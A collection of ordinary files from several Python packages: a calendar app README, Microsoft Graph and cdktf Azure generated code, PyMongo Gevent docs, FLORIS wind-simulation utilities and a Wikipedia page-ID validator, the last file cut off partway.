tmp.append(str(data[i]["hyper-parameters"]["optimizer"]["params"]["lr"]));
tmp.append(str(data[i]["hyper-parameters"]["optimizer"]["name"]));
tmp.append(str(data[i]["hyper-parameters"]["learning_rate_scheduler"]["name"]));
tmp.append(str(data[i]["hyper-parameters"]["loss"]["name"]));
tmp.append(str(data[i]["model"]["params"]["freeze_base_network"]));
tmp.append(str(data[i]["model"]["params"]["use_gpu"]));
if(data[i]["training"]["status"]):
tmp.append(str(data[i]["training"]["outputs"]["training_time"]));
tmp.append(str(data[i]["training"]["outputs"]["max_gpu_usage"]));
else:
tmp.append("NA");
tmp.append("NA");
tmp.append(str(data[i]["dataset"]["dataset_type"]));
tmp.append(str(data[i]["dataset"]["params"]["num_train_images"]));
tmp.append(str(data[i]["dataset"]["params"]["num_val_images"]));
tmp.append(str(data[i]["dataset"]["params"]["train_shuffle"]));
tmp.append(str(data[i]["dataset"]["transforms"]["train"]));
tmp.append(str(data[i]["dataset"]["transforms"]["val"]));
tmp.append(str(data[i]["dataset"]["transforms"]["test"]));
table.append(tmp);
my_df = pd.DataFrame(table);
fname = self.system_dict["master_comparison_dir_relative"] + "comparison.csv";
my_df.to_csv(fname, index=False, header=headers);
self.custom_print("Generated");
self.custom_print("");
|
PypiClean
|
/psu_calendar-0.0.3.tar.gz/psu_calendar-0.0.3/README.md
|
# PSU Calendar
Provides a basic calendar view for your app
## Quick Start
### Dependencies
The following dependency is REQUIRED and must be installed in your app:
- [psu-base](https://pypi.org/project/psu-base/)
### Installation
```shell script
pip install psu-calendar
```
### Configuration
1. Configure [psu-base](https://pypi.org/project/psu-base/) in your Django app
1. Add `psu-calendar` to your `requirements.txt`
1. Add psu_calendar to your INSTALLED_APPS in `settings.py`:
```python
INSTALLED_APPS = [
...
'psu_base',
'psu_calendar',
]
```
## Usage
### In your view.py file
Start by getting the current month, or the month that the user has selected.
When the user selects the prev/next month, a redirect is required to prevent a page refresh from
unexpectedly changing the month again, and is indicated by the month being False.
```python
from psu_calendar.services import calendar_service
from django.shortcuts import render, redirect
def index(request):
month = calendar_service.get_month(request)
# False month indicates need for redirect (to prevent page refresh from changing month again)
if not month:
return redirect("my_calendar_view")
```
Day payloads can be set individually or in bulk. To set an individual day, use get_day() and set its properties as needed:
```python
day = month.get_day(15)
day.payload = '<whatever>'
day.heading = "Special Day!"
```
To set day content in bulk, provide a list of payloads (0-30) or a dict {1: payload, 2: payload, 31: payload}
You may also provide a dict including "heading" and/or "template" in addition to the "payload" for any given day (see day 13 below)
```python
sample_data = {
1: "First day of the month!",
2: {"heading": "Day TWO..."},
3: ["Red", "Orange", "Yellow", "Green", "Blue", "Purple"],
5: ("Hello", "World", "Tuple"),
8: list(range(1024, 1100)),
13: {"heading": "Big Day!", "payload": str(list(range(1024, 1100)))},
}
month.populate_days(sample_data)
```
### In your template.html files
The month object created in your view contains a `template_base_directory` property which defaults to `psu_calendar`.
If your project will contain multiple calendars, you may specify a different template base directory for one or more
of the calendars. Use the `template_base_directory` property to include the month.html template and render the calendar
view. Provide the month object as "month":
```
{%include month.month_template with month=month%}
```
If you have specified an alternate `template_base_directory`, you'll need to copy all 4 templates to the new path
(`month.html`, `nav_header.html`, `day.html`, and `style.css`).
If you're using the default `template_base_directory`, there is some basic formatting built in for when the day payload
is a list or tuple, but you'll probably want to override the `psu_calendar/day.html` template to handle your custom
day content.
## For Developers
The version number must be updated for every PyPi release.
The version number is in `psu_calendar/__init__.py`
### Document Changes
Record every change in [docs/CHANGELOG.txt](docs/CHANGELOG.txt)
### Publishing to PyPi
1. Create accounts on [PyPi](https://pypi.org/account/register/) and [Test PyPi](https://test.pypi.org/account/register/)
1. Create `~/.pypirc`
```
[distutils]
index-servers=
pypi
testpypi
[testpypi]
repository: https://test.pypi.org/legacy/
username: mikegostomski
password: pa$$w0rd
[pypi]
username: mikegostomski
password: pa$$w0rd
```
1. Ask an existing developer to add you as a collaborator - [test](https://test.pypi.org/manage/project/psu-calendar/collaboration/) and/or [prod](https://pypi.org/manage/project/psu-calendar/collaboration/)
1. `python setup.py sdist bdist_wheel --universal`
1. `twine upload --repository testpypi dist/*`
1. `twine upload dist/*`
1. Tag the release in Git. Don't forget to push the tag!
Example:
```shell script
git tag 0.1.2
git push origin 0.1.2
```
|
PypiClean
|
/msgraph_beta_sdk-1.0.0a9-py3-none-any.whl/msgraph/generated/users/item/employee_experience/learning_course_activities/item/learning_course_activity_item_request_builder.py
|
from __future__ import annotations
from dataclasses import dataclass
from kiota_abstractions.get_path_parameters import get_path_parameters
from kiota_abstractions.method import Method
from kiota_abstractions.request_adapter import RequestAdapter
from kiota_abstractions.request_information import RequestInformation
from kiota_abstractions.request_option import RequestOption
from kiota_abstractions.response_handler import ResponseHandler
from kiota_abstractions.serialization import Parsable, ParsableFactory
from typing import Any, Callable, Dict, List, Optional, TYPE_CHECKING, Union
if TYPE_CHECKING:
from ......models import learning_course_activity
from ......models.o_data_errors import o_data_error
class LearningCourseActivityItemRequestBuilder():
"""
Provides operations to manage the learningCourseActivities property of the microsoft.graph.employeeExperienceUser entity.
"""
def __init__(self,request_adapter: RequestAdapter, path_parameters: Optional[Union[Dict[str, Any], str]] = None) -> None:
"""
Instantiates a new LearningCourseActivityItemRequestBuilder and sets the default values.
Args:
pathParameters: The raw url or the Url template parameters for the request.
requestAdapter: The request adapter to use to execute the requests.
"""
if path_parameters is None:
raise Exception("path_parameters cannot be undefined")
if request_adapter is None:
raise Exception("request_adapter cannot be undefined")
# Url template to use to build the URL for the current request builder
self.url_template: str = "{+baseurl}/users/{user%2Did}/employeeExperience/learningCourseActivities/{learningCourseActivity%2Did}{?%24select,%24expand}"
url_tpl_params = get_path_parameters(path_parameters)
self.path_parameters = url_tpl_params
self.request_adapter = request_adapter
async def get(self,request_configuration: Optional[LearningCourseActivityItemRequestBuilderGetRequestConfiguration] = None) -> Optional[learning_course_activity.LearningCourseActivity]:
"""
Get learningCourseActivities from users
Args:
requestConfiguration: Configuration for the request such as headers, query parameters, and middleware options.
Returns: Optional[learning_course_activity.LearningCourseActivity]
"""
request_info = self.to_get_request_information(
request_configuration
)
from ......models.o_data_errors import o_data_error
error_mapping: Dict[str, ParsableFactory] = {
"4XX": o_data_error.ODataError,
"5XX": o_data_error.ODataError,
}
if not self.request_adapter:
raise Exception("Http core is null")
from ......models import learning_course_activity
return await self.request_adapter.send_async(request_info, learning_course_activity.LearningCourseActivity, error_mapping)
def to_get_request_information(self,request_configuration: Optional[LearningCourseActivityItemRequestBuilderGetRequestConfiguration] = None) -> RequestInformation:
"""
Get learningCourseActivities from users
Args:
requestConfiguration: Configuration for the request such as headers, query parameters, and middleware options.
Returns: RequestInformation
"""
request_info = RequestInformation()
request_info.url_template = self.url_template
request_info.path_parameters = self.path_parameters
request_info.http_method = Method.GET
request_info.headers["Accept"] = ["application/json"]
if request_configuration:
request_info.add_request_headers(request_configuration.headers)
request_info.set_query_string_parameters_from_raw_object(request_configuration.query_parameters)
request_info.add_request_options(request_configuration.options)
return request_info
@dataclass
class LearningCourseActivityItemRequestBuilderGetQueryParameters():
"""
Get learningCourseActivities from users
"""
def get_query_parameter(self,original_name: Optional[str] = None) -> str:
"""
Maps the query parameters names to their encoded names for the URI template parsing.
Args:
originalName: The original query parameter name in the class.
Returns: str
"""
if original_name is None:
raise Exception("original_name cannot be undefined")
if original_name == "expand":
return "%24expand"
if original_name == "select":
return "%24select"
return original_name
# Expand related entities
expand: Optional[List[str]] = None
# Select properties to be returned
select: Optional[List[str]] = None
@dataclass
class LearningCourseActivityItemRequestBuilderGetRequestConfiguration():
"""
Configuration for the request such as headers, query parameters, and middleware options.
"""
# Request headers
headers: Optional[Dict[str, Union[str, List[str]]]] = None
# Request options
options: Optional[List[RequestOption]] = None
# Request query parameters
query_parameters: Optional[LearningCourseActivityItemRequestBuilder.LearningCourseActivityItemRequestBuilderGetQueryParameters] = None
|
PypiClean
|
/oneline-0.6.4-alpha.tar.gz/oneline-0.6.4-alpha/js/lib/database/mongodb/doc/examples/gevent.rst
|
Gevent
======
PyMongo supports `Gevent <http://www.gevent.org/>`_. Simply call Gevent's
``monkey.patch_all()`` before loading any other modules:
.. doctest::
>>> # You must call patch_all() *before* importing any other modules
>>> from gevent import monkey; monkey.patch_all()
>>> from pymongo import MongoClient
>>> client = MongoClient()
PyMongo's Gevent support means
that :meth:`~pymongo.mongo_client.MongoClient.start_request()` ensures the
current greenlet (not merely the current thread) uses the same socket for all
operations until :meth:`~pymongo.mongo_client.MongoClient.end_request()` is called.
See the :doc:`requests documentation <requests>` for details on requests in
PyMongo.
Using Gevent With Threads
-------------------------
If you need to use standard Python threads in the same process as Gevent and
greenlets, run ``monkey.patch_socket()``, rather than
``monkey.patch_all()``, and create a
:class:`~pymongo.mongo_client.MongoClient` with ``use_greenlets=True``.
The :class:`~pymongo.mongo_client.MongoClient` will use a special greenlet-aware
connection pool.
.. doctest::
>>> from gevent import monkey; monkey.patch_socket()
>>> from pymongo import MongoClient
>>> client = MongoClient(use_greenlets=True)
An instance of :class:`~pymongo.mongo_replica_set_client.MongoReplicaSetClient`
created with ``use_greenlets=True`` will also use a greenlet-aware pool.
Additionally, it will use a background greenlet instead of a background thread
to monitor the state of the replica set.
.. doctest::
>>> from gevent import monkey; monkey.patch_socket()
>>> from pymongo.mongo_replica_set_client import MongoReplicaSetClient
>>> rsc = MongoReplicaSetClient(
... 'mongodb://localhost:27017,localhost:27018,localhost:27019',
... replicaSet='repl0', use_greenlets=True)
Setting ``use_greenlets`` is unnecessary under normal circumstances; simply call
``patch_all`` to use Gevent with PyMongo.
|
PypiClean
|
/FLORIS-3.4.1.tar.gz/FLORIS-3.4.1/floris/tools/sowfa_utilities.py
|
# Licensed under the Apache License, Version 2.0 (the "License"); you may not
# use this file except in compliance with the License. You may obtain a copy of
# the License at http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations under
# the License.
# See https://floris.readthedocs.io for documentation
import os
import re
import numpy as np
import pandas as pd
from ..logging_manager import LoggerBase
from ..utilities import Vec3
from .cut_plane import CutPlane, get_plane_from_flow_data
from .flow_data import FlowData
class SowfaInterface(LoggerBase):
"""
Object to facilitate interaction with flow data output by SOWFA.
Returns:
:py:class:`floris.tools.sowfa_utilities.SowfaInterface`: object
"""
def __init__(
self,
case_folder,
flow_data_sub_path="array_mean/array.mean0D_UAvg.vtk",
setup_sub_path="setUp",
turbine_array_sub_path="constant/turbineArrayProperties",
turbine_sub_path="constant/turbineProperties",
controlDict_sub_path="system/controlDict",
turbine_output_sub_path="turbineOutput/20000",
assumed_settling_time=None,
):
"""
SowfaInterface object init method.
Args:
case_folder (str): path to folder containing SOWFA data
flow_data_sub_path (str, optional): path to mean data.
Defaults to 'array_mean/array.mean0D_UAvg.vtk'.
setup_sub_path (str, optional): path to setup info.
Defaults to 'setUp'.
turbine_array_sub_path (str, optional): path to wind plant
info. Defaults to 'constant/turbineArrayProperties'.
turbine_sub_path (str, optional): path to wind turbine
info. Defaults to 'constant/turbineProperties'.
controlDict_sub_path (str, optional): path to turbine
controls info. Defaults to 'system/controlDict'.
turbine_output_sub_path (str, optional): path to turbine
operational data. Defaults to 'turbineOutput/20000'.
assumed_settling_time (float, optional): Time to account
for startup transients in simulation. Defaults to None.
"""
self.logger.info(case_folder)
# Save the case_folder and sub_paths
self.case_folder = case_folder
self.setup_sub_path = setup_sub_path
self.turbine_array_sub_path = turbine_array_sub_path
self.turbine_sub_path = turbine_sub_path
self.controlDict_sub_path = controlDict_sub_path
self.turbine_output_sub_path = turbine_output_sub_path
# Read in the input files
# Get control settings from sc input file
# TODO Assuming not dynamic and only one setting applied for each turbine
# TODO If not using the super controller sowfa variant, need alternative
# Get the turbine name and locations
turbine_array_dict = read_foam_file(
os.path.join(self.case_folder, self.turbine_array_sub_path)
)
self.turbine_name = turbine_array_dict["turbineType"].replace(
'"', ""
) # TODO Assuming only one type
self.layout_x, self.layout_y = get_turbine_locations(
os.path.join(self.case_folder, self.turbine_array_sub_path)
)
# Save the number of turbines
self.num_turbines = len(self.layout_x)
# if SC input exists, use it for yaw and pitch as it will over-ride
# if it does not exist, assume the values in turbineArray Properties
if os.path.exists(os.path.join(self.case_folder, "SC_INPUT.txt")):
df_SC = read_sc_input(self.case_folder)
self.yaw_angles = df_SC.yaw.values
self.pitch_angles = df_SC.pitch.values
else:
self.logger.info(
"No SC_INPUT.txt, getting pitch and yaw " + "from turbine array props"
)
self.yaw_angles = get_turbine_yaw_angles(
os.path.join(self.case_folder, self.turbine_array_sub_path)
)
self.pitch_angles = get_turbine_pitch_angles(
os.path.join(self.case_folder, self.turbine_array_sub_path)
)
self.logger.info(self.yaw_angles)
self.logger.info(self.pitch_angles)
# Get the turbine rotor diameter and hub height
turbine_dict = read_foam_file(
os.path.join(self.case_folder, self.turbine_sub_path, self.turbine_name)
)
self.D = 2 * turbine_dict["TipRad"]
# Use the setup file and control file to determine the precursor wind
# speed and the time flow averaging begins (settling time)
setup_dict = read_foam_file(os.path.join(self.case_folder, self.setup_sub_path))
controlDict_dict = read_foam_file(
os.path.join(self.case_folder, self.controlDict_sub_path)
)
start_run_time = controlDict_dict["startTime"]
averaging_start_time = setup_dict["meanStartTime"]
if assumed_settling_time is not None:
self.logger.info(
"Using assumed settling time of %.1f s" % assumed_settling_time
)
self.settling_time = assumed_settling_time
else:
self.settling_time = averaging_start_time - start_run_time
self.precursor_wind_speed = setup_dict["U0Mag"]
# Get the wind direction
self.precursor_wind_dir = setup_dict["dir"]
# Get the surface roughness
self.z0 = setup_dict["z0"]
# Read the outputs
self.turbine_output = read_sowfa_df(
os.path.join(self.case_folder, self.turbine_output_sub_path)
)
# Remove the settling time
self.turbine_output = self.turbine_output[
self.turbine_output.time > self.settling_time
]
# Get the sim_time
self.sim_time_length = self.turbine_output.time.max()
# Read the flow data
try:
self.flow_data = self.read_flow_frame_SOWFA(
os.path.join(case_folder, flow_data_sub_path)
)
# Re-set turbine positions to flow_field origin
self.layout_x = self.layout_x - self.flow_data.origin.x1
self.layout_y = self.layout_y - self.flow_data.origin.x2
except FileNotFoundError:
self.logger.info("No flow field found, setting NULL, origin at 0")
self.flow_data = None # TODO might need a null flow-field
# Try to work out the precursor directory
self.precursor_directory = "unknown"
try:
with open(os.path.join(case_folder, "runscript.preprocess"), "r") as fid:
raw = fid.readlines()
for i, line in enumerate(raw):
if "precursorDir=" in line:
self.precursor_directory = os.path.basename(
line.replace("precursorDir=", "")
)
except FileNotFoundError:
self.logger.info("No preprocess file found")
def __str__(self):
self.logger.info("---------------------")
self.logger.info("Case: %s" % self.case_folder)
self.logger.info("==Turbine Info==")
self.logger.info("Turbine: %s" % self.turbine_name)
self.logger.info("Diameter: %dm" % self.D)
self.logger.info("Num Turbines = %d" % self.num_turbines)
self.logger.info("==Control Settings==")
self.logger.info("Yaw Angles, [" + ", ".join(map(str, self.yaw_angles)) + "]")
self.logger.info(
"Pitch Angles, [" + ", ".join(map(str, self.pitch_angles)) + "]"
)
self.logger.info("==Inflow Info==")
self.logger.info("U0Mag: %.2fm/s" % self.precursor_wind_speed)
self.logger.info("dir: %.1f" % self.precursor_wind_dir)
self.logger.info("==Timing Info==")
self.logger.info("Settling time: %.1fs" % self.settling_time)
self.logger.info("Simulation time: %.1fs" % self.sim_time_length)
self.logger.info("---------------------")
return " "
def calculate_horizontal_plane(
self, height, x_resolution=200, y_resolution=200, x_bounds=None, y_bounds=None
):
"""
Get a horizontal cut through plane at a specific height
Args:
height (float): height of cut plane, defaults to hub-height
Defaults to Hub-height.
x1_resolution (float, optional): output array resolution.
Defaults to 200.
x2_resolution (float, optional): output array resolution.
Defaults to 200.
x1_bounds (tuple, optional): limits of output array.
Defaults to None.
x2_bounds (tuple, optional): limits of output array.
Defaults to None.
Returns:
horplane
"""
# Get points from flow data
df = get_plane_from_flow_data(
self.flow_data, normal_vector="z", x3_value=height
)
# Compute and return the cutplane
return CutPlane(df)
def calculate_cross_plane(
self, x_loc, x_resolution=200, y_resolution=200, x_bounds=None, y_bounds=None
):
"""
Get a horizontal cut through plane at a specific height
Args:
height (float): height of cut plane, defaults to hub-height
Defaults to Hub-height.
x1_resolution (float, optional): output array resolution.
Defaults to 200.
x2_resolution (float, optional): output array resolution.
Defaults to 200.
x1_bounds (tuple, optional): limits of output array.
Defaults to None.
x2_bounds (tuple, optional): limits of output array.
Defaults to None.
Returns:
horplane
"""
# Get the points of data in a dataframe
df = get_plane_from_flow_data(self.flow_data, normal_vector="x", x3_value=x_loc)
# Compute and return the cutplane
return CutPlane(df)
def calculate_y_plane(
self, y_loc, x_resolution=200, y_resolution=200, x_bounds=None, y_bounds=None
):
"""
Get a horizontal cut through plane at a specific height
Args:
height (float): height of cut plane, defaults to hub-height
Defaults to Hub-height.
x1_resolution (float, optional): output array resolution.
Defaults to 200.
x2_resolution (float, optional): output array resolution.
Defaults to 200.
x1_bounds (tuple, optional): limits of output array.
Defaults to None.
x2_bounds (tuple, optional): limits of output array.
Defaults to None.
Returns:
horplane
"""
# Get the points of data in a dataframe
df = get_plane_from_flow_data(self.flow_data, normal_vector="y", x3_value=y_loc)
# Compute and return the cutplane
return CutPlane(df)
def get_average_powers(self):
"""
Return the average power from the simulation per turbine
Args:
Returns:
pow_list (numpy array): an array of powers per turbine
"""
pow_list = []
for t in range(self.num_turbines):
df_sub = self.turbine_output[self.turbine_output.turbine == t]
pow_list.append(df_sub.powerGenerator.mean())
return np.array(pow_list)
def get_time_power_t(self, t):
"""
Return the power over time of a specific turbine t
Args:
t, turbine number
Returns:
power
"""
return self.turbine_output[self.turbine_output.turbine == t].powerGenerator
def get_average_thrust(self):
"""
Return the average thrust from the simulation per turbine
Args:
Returns:
pow_list (numpy array): an array of thrust per turbine
"""
thrust_list = []
for t in range(self.num_turbines):
df_sub = self.turbine_output[self.turbine_output.turbine == t]
thrust_list.append(df_sub.thrust.mean())
return np.array(thrust_list)
def read_flow_frame_SOWFA(self, filename):
"""
Read flow array output from SOWFA
Args:
filename (str): name of file containing flow data.
Returns:
FlowData (pd.DataFrame): a pandas table with the columns,
of all relavent flow info (e.g. x, y, z, u, v, w).
"""
# Read the dimension info from the file
with open(filename, "r") as f:
for _ in range(10):
read_data = f.readline()
if "SPACING" in read_data:
splitstring = read_data.rstrip().split(" ")
spacing = Vec3(
float(splitstring[1]),
float(splitstring[2]),
float(splitstring[3]),
)
if "DIMENSIONS" in read_data:
splitstring = read_data.rstrip().split(" ")
dimensions = Vec3(
int(splitstring[1]), int(splitstring[2]), int(splitstring[3])
)
if "ORIGIN" in read_data:
splitstring = read_data.rstrip().split(" ")
origin = Vec3(
float(splitstring[1]),
float(splitstring[2]),
float(splitstring[3]),
)
# Set up x, y, z as lists
if dimensions.x1 > 1.0:
xRange = np.arange(0, dimensions.x1 * spacing.x1, spacing.x1)
else:
xRange = np.array([0.0])
if dimensions.x2 > 1.0:
yRange = np.arange(0, dimensions.x2 * spacing.x2, spacing.x2)
else:
yRange = np.array([0.0])
if dimensions.x3 > 1.0:
zRange = np.arange(0, dimensions.x3 * spacing.x3, spacing.x3)
else:
zRange = np.array([0.0])
pts = np.array([(x, y, z) for z in zRange for y in yRange for x in xRange])
df = pd.read_csv(
filename, skiprows=10, sep="\t", header=None, names=["u", "v", "w"]
)
x = pts[:, 0]
y = pts[:, 1]
z = pts[:, 2]
return FlowData(
x, y, z, df.u.values, df.v.values, df.w.values, spacing, dimensions, origin
)
def read_sc_input(case_folder, wind_direction=270.0):
"""
Read the super controller (SC) input file to get the wind farm
control settings.
Args:
case_folder (str): path to folder containing SC data.
wind_direction (float, optional): Wind direction.
Defaults to 270..
Returns:
df_SC (pd.DataFrame): dataframe containing SC info.
"""
sc_file = os.path.join(case_folder, "SC_INPUT.txt")
df_SC = pd.read_csv(sc_file, delim_whitespace=True)
df_SC.columns = ["time", "turbine", "yaw", "pitch"]
df_SC["yaw"] = wind_direction - df_SC.yaw
df_SC = df_SC.set_index("turbine")
return df_SC
def read_sowfa_df(folder_name, channels=[]):
"""
New function to use pandas to read in files using pandas
Args:
folder_name (str): where to find the outputs of ALL channels,
not really used for now, but could be a list of desired
channels to only read.
channels (list, optional): list of specific channels to read.
Defaults to [].
"""
# Get the availble outputs
outputNames = [
f
for f in os.listdir(folder_name)
if os.path.isfile(os.path.join(folder_name, f))
]
# Remove the harder input files for now (undo someday)
# hardFiles = [
# "Vtangential",
# "Cl",
# "Cd",
# "Vradial",
# "x",
# "y",
# "z",
# "alpha",
# "axialForce",
# ]
simpleFiles = [
"nacYaw",
"rotSpeedFiltered",
"rotSpeed",
"thrust",
"torqueGen",
"powerRotor",
"powerGenerator",
"torqueRotor",
"azimuth",
"pitch",
]
# Limit to files
if len(channels) == 0:
outputNames = [o for o in outputNames if o in simpleFiles]
else:
outputNames = channels
# Get the number of channels
num_channels = len(outputNames)
if num_channels == 0:
raise ValueError("Is %s a data folder?" % folder_name)
# Now loop through the files
for c_idx, chan in enumerate(outputNames):
filename = os.path.join(folder_name, chan)
# Load the file
df_inner = pd.read_csv(filename, sep=" ", header=None, skiprows=1)
# Rename the columns
df_inner.columns = ["turbine", "time", "dt", chan]
# Drop dt
df_inner = df_inner[["time", "turbine", chan]].set_index(["time", "turbine"])
# On first run declare the new frame
if c_idx == 0:
# Declare the main data frame to return as copy
df = df_inner.copy(deep=True)
# On other loops just add the new frame
else:
df[chan] = df_inner[chan]
# Reset the index
df = df.reset_index()
# Zero the time
df["time"] = df.time - df.time.min()
return df
def read_foam_file(filename):
"""
Method to read scalar and boolean/string inputs from an OpenFOAM
input file.
Args:
filename (str): path to file to read.
Returns:
data (dict): dictionary with OpenFOAM inputs
"""
data = {}
with open(filename, "r") as fid:
raw = fid.readlines()
bloc_comment_test = False
for i, line in enumerate(raw):
if raw[i][0:2] == "/*":
bloc_comment_test = True
if not bloc_comment_test:
# Check if the string is a comment and skip line
if raw[i].strip()[0:2] == "//" or raw[i].strip()[0:1] == "#":
pass
elif len(raw[i].strip()) == 0: # Check if the string is empty and skip line
pass
else:
tmp = raw[i].strip().rstrip().split()
try:
data[tmp[0].replace('"', "")] = np.float(tmp[1][:-1])
except Exception:
try:
data[tmp[0].replace('"', "")] = tmp[1][:-1]
except Exception:
next
if raw[i][0:2] == r"\*":
bloc_comment_test = False
return data
def get_turbine_locations(turbine_array_file):
"""
Extract wind turbine locations from SOWFA data.
Args:
turbine_array_file (str): path to file containing wind plant
layout data.
Returns:
layout_x (np.array): wind plant layout coodinates (east-west).
layout_y (np.array): wind plant layout coodinates (north-south).
"""
x = []
y = []
with open(turbine_array_file, "r") as f:
for line in f:
if "baseLocation" in line:
# Extract the coordinates
data = re.findall(r"[-+]?\d*\.\d+|\d+", line)
# Append the data
x.append(float(data[0]))
y.append(float(data[1]))
layout_x = np.array(x)
layout_y = np.array(y)
return layout_x, layout_y
def get_turbine_pitch_angles(turbine_array_file):
"""
Extract wind turbine blade pitch information from SOWFA data.
Args:
turbine_array_file (str): path to file containing pitch info.
Returns:
p (np.array): blade pitch info.
"""
p = []
with open(turbine_array_file, "r") as f:
for line in f:
if "Pitch" in line:
# Extract the coordinates
data = re.findall(r"[-+]?\d*\.\d+|\d+", line)
# Append the data
p.append(float(data[0]))
return np.array(p)
def get_turbine_yaw_angles(turbine_array_file, wind_direction=270.0):
"""
Extract wind turbine yaw angle information from SOWFA data.
Args:
turbine_array_file (str): path to file containing yaw info.
wind_direction (float, optional): Wind direction.
Defaults to 270..
Returns:
y (np.array): wind turbine yaw info.
"""
y = []
with open(turbine_array_file, "r") as f:
for line in f:
if "NacYaw" in line:
# Extract the coordinates
data = re.findall(r"[-+]?\d*\.\d+|\d+", line)
# Append the data
y.append(wind_direction - float(data[0]))
return np.array(y)
|
PypiClean
|
/oc_ds_converter-0.2.0-py3-none-any.whl/oc_ds_converter/oc_idmanager/wikipedia.py
|
from json import loads
from re import match, sub
from time import sleep
from urllib.parse import unquote
from oc_ds_converter.oc_idmanager.base import IdentifierManager
from requests import ReadTimeout, get
from requests.exceptions import ConnectionError
class WikipediaManager(IdentifierManager):
"""This class implements an identifier manager for wikidata identifier"""
def __init__(self, data={}, use_api_service=True):
"""Wikipedia manager constructor."""
super(WikipediaManager, self).__init__()
self._api = "https://en.wikipedia.org/w/api.php/"
self._use_api_service = use_api_service
self._p = "wikipedia:"
self._data = data
def is_valid(self, wikipedia_id, get_extra_info=False):
wikipedia_id = self.normalise(wikipedia_id, include_prefix=True)
if wikipedia_id is None:
return False
else:
if wikipedia_id not in self._data or self._data[wikipedia_id] is None:
if get_extra_info:
info = self.exists(wikipedia_id, get_extra_info=True)
self._data[wikipedia_id] = info[1]
return (info[0] and self.syntax_ok(wikipedia_id)), info[1]
self._data[wikipedia_id] = dict()
self._data[wikipedia_id]["valid"] = True if (self.exists(wikipedia_id) and self.syntax_ok(
wikipedia_id)) else False
return self._data[wikipedia_id].get("valid")
if get_extra_info:
return self._data[wikipedia_id].get("valid"), self._data[wikipedia_id]
return self._data[wikipedia_id].get("valid")
def normalise(self, id_string, include_prefix=False):
try:
if id_string.startswith(self._p):
wikipedia_string = id_string[len(self._p):]
else:
wikipedia_string = id_string
wikipedia_string = sub("\0+", "", sub("[^0-9]", "", unquote(wikipedia_string)))
return "%s%s" % (
self._p if include_prefix else "",
wikipedia_string.strip(),
)
except:
# Any error in processing the MediaWiki pageID will return None
return None
def syntax_ok(self, id_string):
if not id_string.startswith("wikipedia:"):
id_string = self._p + id_string
return True if match("^wikipedia:[1-9][0-9]*$", id_string) else False
def exists(self, wikipedia_id_full, get_extra_info=False, allow_extra_api=None):
valid_bool = True
if self._use_api_service:
wikipedia_id = self.normalise(wikipedia_id_full)
if wikipedia_id is not None:
tentative = 3
while tentative:
tentative -= 1
try:
query_params = {
"action": "query",
"pageids" : wikipedia_id,
"format": "json",
"formatversion": "1", # format of json output (current version 1; might be replaced w/ v.2)
}
r = get(self._api, params=query_params, headers=self._headers, timeout=30) # controlla
if r.status_code == 200:
r.encoding = "utf-8"
json_res = loads(r.text)
if get_extra_info:
extra_info_result = {}
try:
result = True if 'title' in json_res['query']['pages'][wikipedia_id].keys() else False
extra_info_result["valid"] = result
return result, extra_info_result
except KeyError:
extra_info_result["valid"] = False
return False, extra_info_result
try:
return True if 'title' in json_res['query']['pages'][wikipedia_id].keys() else False
except KeyError:
return False
elif 400 <= r.status_code < 500:
if get_extra_info:
return False, {"valid": False}
return False
except ReadTimeout:
# Do nothing, just try again
pass
except ConnectionError:
# Sleep 5 seconds, then try again
sleep(5)
valid_bool=False
else:
if get_extra_info:
return False, {"valid": False}
return False
if get_extra_info:
return valid_bool, {"valid": valid_bool}
return valid_bool
def extra_info(self, api_response, choose_api=None, info_dict={}):
result = {}
result["valid"] = True
# to be implemented
return result
|
PypiClean
|
/cdktf-cdktf-provider-azurerm-10.0.1.tar.gz/cdktf-cdktf-provider-azurerm-10.0.1/src/cdktf_cdktf_provider_azurerm/private_dns_srv_record/__init__.py
|
import abc
import builtins
import datetime
import enum
import typing
import jsii
import publication
import typing_extensions
from typeguard import check_type
from .._jsii import *
import cdktf as _cdktf_9a9027ec
import constructs as _constructs_77d1e7e8
class PrivateDnsSrvRecord(
_cdktf_9a9027ec.TerraformResource,
metaclass=jsii.JSIIMeta,
jsii_type="@cdktf/provider-azurerm.privateDnsSrvRecord.PrivateDnsSrvRecord",
):
'''Represents a {@link https://registry.terraform.io/providers/hashicorp/azurerm/3.71.0/docs/resources/private_dns_srv_record azurerm_private_dns_srv_record}.'''
def __init__(
self,
scope: _constructs_77d1e7e8.Construct,
id_: builtins.str,
*,
name: builtins.str,
record: typing.Union[_cdktf_9a9027ec.IResolvable, typing.Sequence[typing.Union["PrivateDnsSrvRecordRecord", typing.Dict[builtins.str, typing.Any]]]],
resource_group_name: builtins.str,
ttl: jsii.Number,
zone_name: builtins.str,
id: typing.Optional[builtins.str] = None,
tags: typing.Optional[typing.Mapping[builtins.str, builtins.str]] = None,
timeouts: typing.Optional[typing.Union["PrivateDnsSrvRecordTimeouts", typing.Dict[builtins.str, typing.Any]]] = None,
connection: typing.Optional[typing.Union[typing.Union[_cdktf_9a9027ec.SSHProvisionerConnection, typing.Dict[builtins.str, typing.Any]], typing.Union[_cdktf_9a9027ec.WinrmProvisionerConnection, typing.Dict[builtins.str, typing.Any]]]] = None,
count: typing.Optional[typing.Union[jsii.Number, _cdktf_9a9027ec.TerraformCount]] = None,
depends_on: typing.Optional[typing.Sequence[_cdktf_9a9027ec.ITerraformDependable]] = None,
for_each: typing.Optional[_cdktf_9a9027ec.ITerraformIterator] = None,
lifecycle: typing.Optional[typing.Union[_cdktf_9a9027ec.TerraformResourceLifecycle, typing.Dict[builtins.str, typing.Any]]] = None,
provider: typing.Optional[_cdktf_9a9027ec.TerraformProvider] = None,
provisioners: typing.Optional[typing.Sequence[typing.Union[typing.Union[_cdktf_9a9027ec.FileProvisioner, typing.Dict[builtins.str, typing.Any]], typing.Union[_cdktf_9a9027ec.LocalExecProvisioner, typing.Dict[builtins.str, typing.Any]], typing.Union[_cdktf_9a9027ec.RemoteExecProvisioner, typing.Dict[builtins.str, typing.Any]]]]] = None,
) -> None:
'''Create a new {@link https://registry.terraform.io/providers/hashicorp/azurerm/3.71.0/docs/resources/private_dns_srv_record azurerm_private_dns_srv_record} Resource.
:param scope: The scope in which to define this construct.
:param id_: The scoped construct ID. Must be unique amongst siblings in the same scope
